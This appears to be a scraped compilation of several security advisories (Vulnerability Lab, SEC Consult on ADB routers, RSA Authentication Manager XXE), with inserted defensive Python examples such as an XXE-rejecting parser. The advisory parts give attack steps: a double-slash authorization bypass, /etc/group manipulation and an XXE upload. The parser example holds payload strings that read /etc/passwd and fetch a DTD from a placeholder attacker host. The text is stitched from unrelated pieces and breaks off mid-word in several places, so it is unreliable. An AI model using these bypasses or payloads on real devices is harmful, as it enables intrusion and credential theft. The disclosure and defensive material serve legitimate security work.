Server[Microsoft-IIS/7.5] X-Powered-By[ASP.NET] Content-Length[1245] Connection[keep-alive] Reference(s): http://event.localhost/ http://event.localhost/nw/ http://event.localhost/nw/_ui/ Solution - Fix & Patch: === The issue has been reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public disclosure process took about 10 month. Security Risk: == The security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0). Credits & Authors: ====== Lawrence Amer (Vulnerability Lab Core Research Team) [zeroat...@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. 
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability
Document Title:
===
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability

References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2133

Security ID: INTEL-SA-00134
https://nvd.nist.gov/vuln/detail/CVE-2018-3661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661

Acknowledgements:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661

CVE-ID:
===
CVE-2018-3661

Release Date:
=
2018-07-11

Vulnerability Laboratory ID (VL-ID):
2133

Common Vulnerability Scoring System:
5.5

Vulnerability Class:
Buffer Overflow

Current Estimated Price:
3.000€ - 4.000€

Abstract Advisory Information:
==
The Vulnerability Laboratory core research team discovered a local buffer overflow vulnerability in the official Intel System CU 14.0 and 14.1.

Vulnerability Disclosure Timeline:
==
2018-05-15: Release Date (Intel)
2018-07-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=
Published

Affected Product(s):
Intel Systems
Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (Intel® C620 Series Chipsets b19)

Exploitation Technique:
===
Local

Severity Level:
===
Medium

Authentication Type:
Restricted authentication (user/moderator) - User privileges

User Interaction:
=
No User Interaction

Disclosure Type:
Bug Bounty Program

Technical Details & Description:
A local buffer overflow vulnerability has been discovered in the official Intel System CU 14.0 and 14.1 utilities. The vulnerability can be exploited by local attackers to overwrite active registers and compromise the process or the affected computer system. The Intel system configuration utilities are vulnerable to a denial of service caused by a classic buffer overflow: by sending a specially crafted request, a local authenticated attacker can trigger a denial of service condition.
Affected are versions of syscfg.exe before release 14.0 build 16 or, for systems based on Intel® C620 Series Chipsets, 14.1 build 19. Affected are versions of selview.exe before release 14.0 build 21 or, for systems based on Intel® C620 Series Chipsets, before 14.0 build 11. Exploitation of the local buffer overflow vulnerability requires no user interaction and only local user privileges (see "Authentication Type" above). Successful exploitation results in a compromise of the local system process or the affected computer system.

Vulnerable File(s):
[+] syscfg.exe
[+] selview.exe

https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg
https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg

Security Risk:
==
The security risk of the exploitable local buffer overflow vulnerability in the utilities software is estimated as medium.

Credits & Authors:
==
S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Secutech DSL WR RIS 330 - Filter Bypass Vulnerability
:language=en
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

MACC==advance.asp_time=1477567396.02=3_type=2=Lawrence%40connecy.au=hivulnerable=7331

RESPONSE-
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://localhost/notice.asp

This document has moved to a new <a href="http://localhost/notice.asp">location</a>. Please update your documents to reflect the new location.

Solution - Fix & Patch:
===
The vulnerability can be patched by restricting and validating the affected key parameter of the POST request on the server side. Reject any value shorter than 8 characters before it is saved, so that the length check cannot be bypassed by submitting the request directly, and the customers using the mentioned hardware are permanently protected.

Security Risk:
==
The security risk of the filter bypass router vulnerability in the password setup module is estimated as medium (CVSS 3.3).

Credits & Authors:
======
Lawrence Amer (Vulnerability Lab Core Research Team) [zeroat...@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer
SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13110
impact: critical
homepage: http://www.adbglobal.com
found: 2016-07-11
by: Stefan Viehböck (Office Vienna)
    Johannes Greil (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) even if it was previously disabled by the ISP. Depending on the feature set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration, manipulate settings in the web GUI and escalate privileges to the highest access rights.

It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to gain access to the CLI (if it has been previously disabled by the configuration) and escalate his privileges. Depending on the CLI features it is possible to extract the whole configuration and manipulate settings or gain access to debug features of the device, e.g. via "debug", "upgrade", "upload" etc. commands in the CLI. Attackers can gain access to sensitive configuration data such as VoIP credentials or other information and manipulate any settings of the device.

Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and overwrite the local linux groups called "remoteaccess" or "localaccess" (in /etc/group) which define access to Telnet or SSH on the ADB devices. It may be possible to overwrite the "root" group as well, but that may brick the device, and the default user is already within the "root" group. Hence this attack has not been further tested.
The following steps describe the attack:

a) Add a new group called "localaccess" via the web GUI here:
http://$IP/ui/dboard/storage/storageusers?backto=storage

This will generate the following new group in /etc/group. The original "localaccess" group will be overwritten.
localaccess:Storage Group:5001:

b) Then delete this group via the web GUI again; the entry will be removed from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and add your user account (e.g. admin) wh
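As an added illustration, not part of the SEC Consult advisory and not ADB's firmware code, the following Python audits an /etc/group file for the collision the steps above create (a user-created group shadowing a system group) and shows the server-side check the "Storage users" form should apply before writing a group name. The sample file content, the reserved group set and the name pattern are constructed assumptions; take the real reserved set from the device's own /etc/group.

```python
import re

# Groups that gate shell access on the devices, as named in the advisory.
# Which groups matter on a given firmware is an assumption: take the real
# set from the device's own /etc/group.
RESERVED_GROUPS = frozenset({"root", "remoteaccess", "localaccess"})

# Conservative allowlist for a new group name (assumption: the GUI accepts
# a superset of this; the server should accept no more than this).
GROUP_NAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$", re.IGNORECASE)

# Constructed /etc/group excerpt modelled on step a) of the advisory: the
# firmware's own localaccess entry followed by the GUI-created duplicate
# (the odd password field "Storage Group" is what the advisory shows).
SAMPLE_GROUP_FILE = """\
root:x:0:root
remoteaccess:x:1002:
localaccess:x:1001:
localaccess:Storage Group:5001:admin
"""


def parse_group_file(text):
    """Parse /etc/group content into (name, gid, members) tuples.

    Malformed lines are skipped so the audit still reports on the rest.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue
        name, _password, gid, members = fields
        entries.append((name, gid, [m for m in members.split(",") if m]))
    return entries


def audit_group_file(text):
    """Report duplicate group names and the membership of reserved groups.

    A duplicate is exactly the advisory's bug class: a user-created group
    shadowing a system group. The reserved-group membership tells an auditor
    who currently holds Telnet/SSH access.
    """
    seen = set()
    duplicates = set()
    reserved_members = {}
    for name, _gid, members in parse_group_file(text):
        if name in seen:
            duplicates.add(name)
        seen.add(name)
        if name in RESERVED_GROUPS:
            reserved_members.setdefault(name, []).extend(members)
    return {"duplicates": sorted(duplicates), "reserved_members": reserved_members}


def validate_new_group_name(name, existing_groups):
    """Server-side check the storage-users form should apply before writing.

    Returns (ok, reason). Reserved names and names that already exist are
    rejected case-insensitively, so "LocalAccess" cannot shadow "localaccess".
    """
    if not GROUP_NAME_RE.match(name):
        return False, "invalid characters or length"
    lowered = name.lower()
    if lowered in RESERVED_GROUPS:
        return False, "reserved system group"
    if lowered in {g.lower() for g in existing_groups}:
        return False, "group already exists"
    return True, ""


if __name__ == "__main__":
    print(audit_group_file(SAMPLE_GROUP_FILE))
    existing = [e[0] for e in parse_group_file(SAMPLE_GROUP_FILE)]
    for candidate in ("localaccess", "LocalAccess", "storage", "bad name"):
        print(candidate, validate_new_group_name(candidate, existing))
```

The audit is something a firmware reviewer can run against an extracted root file system; the validator is the missing input check on the web GUI side. Note that rejecting only exact matches would still allow step c) of the attack if the firmware compares names case-insensitively anywhere, which is why both checks fold case.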
SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
title: Authorization Bypass
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13109
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-28
by: Johannes Greil (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP. It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP. The attacker needs some user account, regardless of its permissions, for login; e.g. the default one provided by the ISP or printed on the device can be used.

It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB device, a standard user account may not have all settings enabled within the web GUI. An authenticated attacker is able to bypass those restrictions by adding a second slash in front of the forbidden entry of the path in the URL. It is possible to access forbidden entries within the first layer of the web GUI; any further subsequent layers/paths (sub menus) could not be accessed during testing, but further exploitation can't be ruled out entirely.

Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!
In our tests it was not possible to access subsequent layers. For example, assume that both the proxy menu and the submenu "rtsp" settings are blocked; a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too when further, deeper tests are performed.

Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent versions at the time of discovery:
The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_
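An added example, not from the advisory and not the ADB web server's code: a literal-string deny list of the kind whose behaviour the double slash suggests, next to a version that canonicalizes the request path before checking it and also denies sub-paths of a blocked menu. The blocked paths come from the URLs above; the proxy entries and the canonicalization rules (percent-decoding once, case folding) are assumptions made for the demonstration.

```python
import posixpath
from urllib.parse import unquote

# Pages a restricted ISP profile must not reach. The first entry is the
# advisory's example; the proxy entries are constructed to show the
# sub-menu case it mentions. The real list is ISP- and firmware-dependent.
FORBIDDEN_PATHS = frozenset({
    "/ui/dboard/settings/management/telnetserver",
    "/ui/dboard/settings/proxy",
    "/ui/dboard/settings/proxy/rtsp",
})


def is_forbidden_naive(path):
    """Literal comparison of the request path as typed. Behaves like the
    advisory's target: one extra slash and the entry is no longer "blocked"."""
    return path in FORBIDDEN_PATHS


def canonicalize(path):
    """Reduce a request path to one spelling before any policy decision.

    - percent-decode once (assumption: the server decodes exactly once too)
    - collapse repeated slashes, resolve "." and "..", drop a trailing slash
      (posixpath.normpath keeps a leading "//", so that is stripped here)
    - fold case (assumption: a deny list is safer applied case-insensitively)
    """
    path = unquote(path)
    if not path.startswith("/"):
        path = "/" + path
    norm = posixpath.normpath(path)
    while norm.startswith("//"):
        norm = norm[1:]
    return norm.lower()


def is_forbidden_hardened(path):
    """Canonicalize, then deny if the path or any of its ancestors is blocked,
    so the sub-menus of a blocked menu are blocked as well."""
    parts = canonicalize(path).split("/")
    for depth in range(len(parts), 1, -1):
        if "/".join(parts[:depth]) in FORBIDDEN_PATHS:
            return True
    return False


if __name__ == "__main__":
    for url in ("/ui/dboard/settings/management/telnetserver",
                "/ui/dboard/settings/management//telnetserver",
                "/ui/dboard/settings/proxy//rtsp"):
        print(url, is_forbidden_naive(url), is_forbidden_hardened(url))
```

The general lesson is that authorization must be decided on the canonical resource, not on the request string; a deny list that matches literally is bypassed by every alternative spelling the router accepts for the same page (extra slashes, dot segments, percent-encoding). The ancestor walk also closes the "sub menu" gap the advisory leaves open.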
SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13108
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-09
by: Johannes Greil (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with the highest privileges. Attackers are able to modify any settings that might otherwise have been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures.

Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports so that customers can use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks, e.g. via the FTP server functionality, which has been fixed in more recent firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with the highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon within the smb.conf on the device is "wide links = no", which normally prevents gaining access to the root file system of the device using symlink attacks via a USB drive.
But an attacker is able to exploit both a web GUI input validation flaw and a samba configuration file parsing problem, which together make it possible to access the root file system of the device with root access rights via a manipulated USB drive. The attacker can then edit various system files, e.g. passwd and the session information of the web server, in order to escalate web GUI privileges, start a telnet server and gain full system level shell access as root.

This is a local attack and not possible via remote access vectors, as an attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices, hence this attack is quite p
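An added example, not part of the advisory and not the device firmware: an offline audit that walks a share root (here a constructed temporary directory standing in for the USB drive) and reports every symlink whose target resolves outside the share, which is the condition "wide links = no" exists to block. It examines the file system the way samba would see it; it does not reproduce the web GUI / smb.conf parsing flaw, whose details the advisory does not give.

```python
import os
import tempfile


def find_escaping_symlinks(share_root):
    """Return share-relative paths of symlinks whose target resolves outside
    the share root. Links are not followed during the walk, so a link loop
    cannot hang the audit, and every link (file or directory) is examined.
    """
    root = os.path.realpath(share_root)
    offenders = []
    for dirpath, dirnames, filenames in os.walk(share_root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            # realpath resolves every component, so a link into a directory
            # that is itself a link outside the share is caught as well.
            target = os.path.realpath(path)
            inside = target == root or target.startswith(root + os.sep)
            if not inside:
                offenders.append(os.path.relpath(path, share_root))
    return sorted(offenders)


def build_demo_share():
    """Construct a throwaway directory standing in for the USB drive, with
    one harmless link and two that point at the host file system the way a
    symlink attack via a USB drive would. Returns the share path (constructed
    data, not taken from a real device)."""
    base = tempfile.mkdtemp(prefix="usbshare-")
    share = os.path.join(base, "usb")
    os.makedirs(os.path.join(share, "photos"))
    with open(os.path.join(share, "photos", "holiday.txt"), "w") as fh:
        fh.write("benign file\n")
    os.symlink("photos", os.path.join(share, "pics"))              # stays inside
    os.symlink("/", os.path.join(share, "rootfs"))                  # escapes to /
    os.symlink("../../etc", os.path.join(share, "photos", "etc"))   # escapes via ..
    return share


if __name__ == "__main__":
    demo = build_demo_share()
    print("escaping symlinks:", find_escaping_symlinks(demo))
```

For a share fed from untrusted removable media, samba's "follow symlinks = no" is the stronger setting, since it refuses every symlink rather than only those leaving the share; "wide links = no" on its own still depends on the daemon's own path checks, and the advisory's point is that on these devices those checks were undermined through the configuration path, which no audit of the drive contents can repair.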
SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
fixed version: 8.3 P1 and later
CVE number: CVE-2018-1247
impact: High
homepage: https://www.rsa.com
found: 2017-11-16
by: Mantas Juskauskas (Office Vilnius)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about

Business recommendation:
By exploiting the vulnerabilities documented in this advisory an attacker can obtain sensitive information from the RSA Authentication Manager file system, initiate arbitrary TCP connections or cause a DoS. In addition, clients of the RSA Authentication Manager can be affected by exploiting the client-side issues.

SEC Consult recommends to apply the available patches from the vendor.

Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The XML parser in use resolves XML external entities, which allows an authenticated attacker (or an attacker who is able to trick an authenticated user into importing malicious XML files) to read files, send requests to systems on the internal network (e.g. port scanning) or cause a DoS (e.g. billion laughs attack).

This issue has been fixed by RSA as described in the advisory DSA-2018-086. (http://seclists.org/fulldisclosure/2018/May/18)

2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input sufficiently.
This leads to a reflected cross-site scripting vulnerability. With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code into the victim's web browser. Once the victim clicks a malicious link, the attacker's code is executed in the context of the victim's web browser. The vulnerability exists in a third party component called pmfso.

This issue has been fixed by RSA as described in the advisory DSA-2018-082.

3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient validation before storing it in the DOM. This issue can be exploited to cause reflected cross-site scripting. The identified issues exist in third party components. One of the affected components is PopCalendarX, which has an assigned CVE (CVE-2017-9072).

This issue has been fixed by RSA as described in the advisory DSA-2018-082. Two further issues affecting other third party components are not yet fixed, as the third party vendor has not yet supplied a patch to RSA.

Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated users to import SecurID Token jobs in XML format. By importing an XML file with malicious XML code into the application, it is possible to exploit a blind XXE vulnerability within the application.
For example, in order to read arbitrary files from the RSA Authentication Manager OS, the following malicious XML file can be imported via the affected endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]
[snip]
-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile"; filename="xxe_test.xml"
Content-Type: text/xml

/a.dtd">
-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==

In this case, the attacker has to host the defined a.dtd file in the web root of a controlled web server:
==
# cat /var/www/a.dtd
:8080/%p1;'>">
%p2;
==

Assuming that the RSA Authentication Manager OS has network level access to the TCP port 80 and 8080 of th
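As an added example, not from the advisory and not RSA's code: a parser for untrusted XML uploads that refuses any DOCTYPE, entity declaration or external entity reference before anything can be read or fetched, and records the external DTD location from a blind XXE attempt so the upload handler can log it. The two payload strings are constructed illustrations of the technique described above (an external DTD whose parameter entities read a file and send it back); the advisory's own payload is not reproduced on this page, and the attacker hostname is a placeholder.

```python
import xml.parsers.expat as expat

# Constructed illustrations of the technique (placeholder attacker host).
# Blind/OOB variant: the DTD is fetched from the attacker, who defines the
# file-reading parameter entity and the entity that sends its content back.
OOB_XXE = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE data SYSTEM "http://attacker.example/a.dtd">'
           b'<data>&send;</data>')
# Internal-subset variant: %p1 reads the file, %p2 pulls the attacker DTD.
INLINE_XXE = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE data ['
              b'<!ENTITY % p1 SYSTEM "file:///etc/passwd">'
              b'<!ENTITY % p2 SYSTEM "http://attacker.example/a.dtd">'
              b'%p2;]>'
              b'<data/>')
# A clean token-job style document (constructed; not the product's schema).
BENIGN = b'<?xml version="1.0"?><tokenJobs><job id="1"/><job id="2"/></tokenJobs>'


class UnsafeXML(Exception):
    """Raised for any upload that uses a DTD. Carries the external system id
    (the attacker-controlled DTD URL in an OOB XXE) for logging."""

    def __init__(self, message, system_id=None):
        super().__init__(message)
        self.system_id = system_id


def parse_untrusted_xml(data):
    """Parse an uploaded document while refusing every DTD feature.

    Returns {"root": tag, "elements": n} for a clean document. Raises
    UnsafeXML at the first DOCTYPE, entity declaration or external entity
    reference, i.e. before anything could be read or fetched.
    """
    parser = expat.ParserCreate()
    # Never fetch the external subset or expand parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    result = {"root": None, "elements": 0}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE %r rejected" % name, system_id)

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        raise UnsafeXML("entity %r rejected" % name, system_id)

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML("external entity reference rejected", system_id)

    def on_start(tag, attrs):
        if result["root"] is None:
            result["root"] = tag
        result["elements"] += 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML("malformed XML: %s" % exc) from exc
    return result


def triage_upload(data):
    """Return ("ok", info) or ("rejected", reason, system_id): the tuple an
    upload handler would log and a detection rule would alert on."""
    try:
        return ("ok", parse_untrusted_xml(data))
    except UnsafeXML as exc:
        return ("rejected", str(exc), exc.system_id)


if __name__ == "__main__":
    for sample in (BENIGN, OOB_XXE, INLINE_XXE):
        print(triage_upload(sample))
```

Rejecting the DOCTYPE outright is the right policy for an import format that has no business declaring entities; it is simpler and safer than trying to distinguish harmless from harmful declarations. Python's expat does not fetch external DTDs unless asked, so the guard here is belt and braces, but the same design matters more on platforms whose default parser does resolve them (a JAXP DocumentBuilder without the disallow-doctype-decl feature, for instance). The logged system id is exactly the attacker host an incident responder would want to pivot on.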
Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
The following CVE numbers have been assigned now:

XSS issue: CVE-2018-11090
Arbitrary File Upload: CVE-2018-11091

On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
> ===
> title: Arbitrary File Upload & Cross-site scripting
> product: MyBiz MyProcureNet
> vulnerable version: 5.0.0
> fixed version: unknown
> CVE number: -
> impact: Critical
> homepage: http://www.mybiz.net/
> found: 2018-01-29
> by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
>     Fikri Fadzil (Office Singapore)
>     Wan Ikram (Office Kuala Lumpur)
>     Jasveer Singh (Office Kuala Lumpur)
>     SEC Consult Vulnerability Lab
>
>     An integrated part of SEC Consult
>     Europe | Asia | North America
>
>     https://www.sec-consult.com
>
> ===
>
> Vendor description:
> ---
> "MyBiz is a company fixated on developing technology which transforms the way
> business is done online. At the intersection of what one business needs from
> another is the potential for value to be created differently. This
> intersection for the exchange of value requires technology but in
> fundamentally very different ways from traditional enterprise systems. MyBiz
> believes that the chemistry of business is the business relationships between
> enterprises. The strength of the business relationship drives the success and
> future of the business. MyBiz believes that these business relationships need
> to be captured and orchestrated. MyBiz developed our proprietary Business
> Relationship Network engine, a platform to capture business relationships as
> data to drive new business services which create value efficiently."
>
> Source: http://www.mybiz.net/copy-of-our-story
>
>
> Business recommendation:
>
> The vendor did not reply to our inquiries since February 2018 hence the issues
> might still exist in current versions.
>
> SEC Consult recommends not to use this product until a thorough security review
> has been performed by security professionals and all identified issues have
> been resolved. It is assumed that MyBiz products are affected by further
> critical security issues.
>
>
> Vulnerability overview/description:
> ---
